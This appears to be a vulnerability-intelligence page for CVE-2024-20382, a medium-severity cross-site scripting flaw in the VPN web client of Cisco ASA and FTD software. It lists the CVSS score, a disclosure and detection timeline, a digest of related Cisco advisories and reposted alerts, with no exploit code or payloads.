CVE-2024-20382
Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) (CWE-80)
Published: Oct 23, 2024 / Updated: 27d ago
010
CVSS 6.1EPSS 0.04%Medium
CVE info copied to clipboard
A vulnerability in the VPN web client services feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a browser that is accessing an affected device. This vulnerability is due to improper validation of user-supplied input to application endpoints. An attacker could exploit this vulnerability by persuading a user to follow a link designed to submit malicious input to the affected application. A successful exploit could allow the attacker to execute arbitrary HTML or script code in the browser in the context of the web services page.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Timeline
First Article
Feedly found the first article mentioning CVE-2024-20382. See article
Oct 23, 2024 at 6:05 PM / CVE - NEW | THREATINT
CVSS Estimate
Feedly estimated the CVSS score as MEDIUM
Oct 23, 2024 at 6:06 PM
CVE Assignment
NVD published the first details for CVE-2024-20382
Oct 23, 2024 at 6:15 PM
CVSS
A CVSS base score of 6.1 has been assigned.
Oct 23, 2024 at 6:20 PM / nvd
Detection in Vulnerability Scanners
Detection for the vulnerability has been added to Qualys (317547)
Oct 24, 2024 at 7:53 AM
EPSS
EPSS Score was set to: 0.04% (Percentile: 9.8%)
Oct 24, 2024 at 9:50 AM
Detection in Vulnerability Scanners
Detection for the vulnerability has been added to Qualys (317561)
Oct 28, 2024 at 7:53 AM
Affected Systems
Cisco/adaptive_security_appliance_software
+null more
Attack Patterns
CAPEC-18: XSS Targeting Non-Script Elements
+null more
News
Cisco Products Multiple Vulnerabilities
Multiple vulnerabilities were identified in Cisco products. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege, remote code execution, sensitive information disclosure, cross-site scripting and security restriction bypass on the targeted system. Note: CVE-2024-20481 is being exploited in the wild. The Cisco Product Security Incident Response Team (PSIRT) is aware of malicious use of this vulnerability. Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain a missing release of resource after effective lifetime vulnerability that could allow an unauthenticated, remote attacker to cause a denial-of-service (DoS) of the RAVPN service. RISK: Extremely High Risk Extremely High Risk TYPE: Security software and application – Security Software & Appliance Impact Denial of Service Remote Code Execution Elevation of Privilege Information Disclosure Cross-Site Scripting Security Restriction Bypass System / Technologies affected Cisco Adaptive Security Appliance (ASA) Software Cisco Adaptive Security Virtual Appliance (ASAv) Cisco Secure Firewall Threat Defense Virtual (FTDv) Cisco FirePOWER Services Cisco Firepower Threat Defense (FTD) Software Cisco Secure Firewall Management Center (FMC) Software Please refer to the link below for detail: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-vdb-snort-djj4cnbR https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-dos-eEDWu5RM https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-vpn-4gYEWMKg https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-xss-infodisc-RL4mJFer https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-html-inj-nfJeYHxz https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort-rf-bypass-OY8f3pnM https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort-bypass-PTry37fX https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-geoip-bypass-MB4zRDu https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-bf-dos-vDZhLqrW https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-nsgacl-bypass-77XnEAsL https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-acl-bypass-VvnLNKqf https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ftd-priv-esc-hBS9gnwq https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-xss-dhJxQYZs https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-yjj7ZjVq https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-sql-inject-2EnmTC8v https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-sql-inj-LOYAFcfq https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-2HBkA97G https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-file-read-5q4mQRn https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-priv-esc-CMQ4S6m7 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-g8AOKnDP https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-vpn-nyH3fhp https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-persist-lce-vU3ekMJ3 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-snmp-dos-7TcnzxTU https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-dap-dos-bhEkP7n https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-tls-dos-QXYE5Ufy https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd2100-snort-dos-M9HuMt75 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sa-ftd-snort-fw-BCJTZPMu https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftdvirtual-dos-MuenGnYR https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-tls-CWY6zXB https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-dos-hOnB9pH4 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-vpn-cZf8gT https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ikev2-dos-9FgEyHsF https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-statcred-dFC8tXT5 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-v3AWDqN7 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF Solutions Before installation of the software, please visit the vendor web-site for more details.
cisco cisco-sa-snort-rf-bypass-OY8f3pnM: Multiple Cisco Products Snort Rate Filter Bypass Vulnerability
Development Last Updated: 10/24/2024 CVEs: CVE-2024-20274 , CVE-2024-20387 , CVE-2024-20426 , CVE-2024-20331 , CVE-2024-20264 , CVE-2024-20485 , CVE-2024-20273 , CVE-2024-20474 , CVE-2024-20471 , CVE-2024-20377 , CVE-2024-20495 , CVE-2024-20407 , CVE-2024-20341 , CVE-2024-20473 , CVE-2024-20364 , CVE-2024-20402 , CVE-2024-20493 , CVE-2024-20300 , CVE-2024-20339 , CVE-2024-20269 , CVE-2024-20340 , CVE-2024-20370 , CVE-2024-20382 , CVE-2024-20342 , CVE-2024-20412 , CVE-2024-20329 , CVE-2024-20372 , CVE-2024-20403 , CVE-2024-20431 , CVE-2024-20494 , CVE-2024-20410 , CVE-2024-20472 , CVE-2024-20260 , CVE-2024-20330 , CVE-2024-20388 , CVE-2024-20409 , CVE-2024-20526 , CVE-2024-20268 , CVE-2024-20298 , CVE-2024-20351 , CVE-2024-20386 , CVE-2024-20415 , CVE-2024-20424 , CVE-2024-20408 , CVE-2024-20481
CVE Alert: CVE-2024-20382 - https://www.redpacketsecurity.com/cve_alert_cve-2024-20382/ #OSINT #ThreatIntel #CyberSecurity #cve_2024_20382
CVE Alert: CVE-2024-20382 - redpacketsecurity.com/cve_al… #OSINT #ThreatIntel #CyberSecurity #cve_2024_20382
CVE Alert: CVE-2024-20382 - https://www. redpacketsecurity.com/cve_aler t_cve-2024-20382/ # OSINT # ThreatIntel # CyberSecurity # cve_2024_20382
CVE Alert: CVE-2024-20382
An attacker could exploit this vulnerability by persuading a user to follow a link designed to submit malicious input to the affected application. A vulnerability in the VPN web client services feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a browser that is accessing an affected device.
See 5 more articles and social media posts